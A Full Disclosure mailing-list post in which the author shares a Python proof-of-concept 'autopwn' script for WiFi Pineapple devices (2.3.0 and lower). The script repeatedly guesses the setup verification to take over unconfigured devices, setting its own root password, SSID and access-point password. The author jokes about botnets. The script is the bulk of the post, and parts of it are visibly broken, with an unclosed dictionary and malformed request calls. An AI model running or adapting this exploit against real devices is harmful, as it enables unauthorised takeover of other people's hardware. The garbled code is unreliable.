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[FD] Pineapple autopwn script 2.3.0 or lower versions.
- To: fulldisclosure@xxxxxxxxxxxx
- Subject: [FD] Pineapple autopwn script 2.3.0 or lower versions.
- From: Electric Mind <mailto@xxxxxxxxxxxxxx>
- Date: Sat, 8 Aug 2015 06:18:40 +0300
I have wrote PoC half a year ago, because i needed to try it on my Chinese
router, and it still works on freshly purchased pineapple devices. (hello from
Defcon ;) )
And guys, it’s not a talk for the defcon, especially if you have done a botnet
based on that shit… ;)
See ya tomorrow at WiFi village...
POC is below:
#!/usr/bin/env python
from random import choice
from urllib import urlencode
from httplib import HTTPConnection
settings = {
"ip": "",
"port": 1471,
"root_password": "toor",
"ap_ssid": "AccessPoint",
"ap_password": "password"
parameters = ('amber', 'blue', 'red',)
values = ('on', 'off', 'blink',)
connection = HTTPConnection(settings["ip"], settings["port"])
php_session = ""
while True:
post_data = "{}&verify_pineapple=true".format(urlencode(dict((parameter,
choice(values),) for parameter in parameters)))
connection.request("POST", "/?action=verify_pineapple", post_data,
{"Content-type": "application/x-www-form-urlencoded", "Connection":
"keep-alive", "Cookie" : php_session})
response = connection.getresponse()
php_session = php_session or response.getheader("set-cookie").split(";")[0]
if "action=set_password" in response.read():
connection.request("POST", "/?action=set_password",
{"Content-type": "application/x-www-form-urlencoded", "Cookie": php_session})
connection.request("POST", "/?action=set_ssid",
settings["ap_password"]), {"Content-type": "application/x-www-form-urlencoded",
"Cookie": php_session})
connection.request("GET", "/?action=finish")
print "Setup finished"
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